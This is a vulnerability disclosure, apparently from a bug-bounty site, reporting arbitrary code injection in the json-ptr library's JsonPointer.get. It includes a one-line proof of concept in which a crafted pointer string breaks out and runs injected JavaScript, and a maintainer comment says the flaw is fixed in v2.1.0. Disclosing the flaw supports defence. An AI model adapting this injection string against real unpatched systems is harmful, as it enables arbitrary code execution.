Code Injection in flitbit/json-ptr

Valid

Reported on

Mar 28th 2021

✍️ Description

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

JsonPointer.get that is designed to get the target object's value at the pointer's location is vulnerable to arbitrary code injection and exection, mainly due to the lack of sanitizing for user's inputs of the pointer's location.

🕵️‍♂️ Proof of Concept

// PoC.js
jptr=require('json-ptr');
JsonPointer=jptr.JsonPointer;
JsonPointer.get({}, '/aaa\'\]\)\) !== \'undefined\') \{return it;\}; console.log(\'HACKED\'); if((([\'a'); // HACKED

💥 Impact

This vulnerability is capable of executing arbitrary js codes.

Occurrences

Jamie Slome
2 years ago

Admin

Validation should be working now - apologies for any issues!

Phillip Clark
2 years ago

For reference; fixed in v2.1.0 and above.

to join this conversation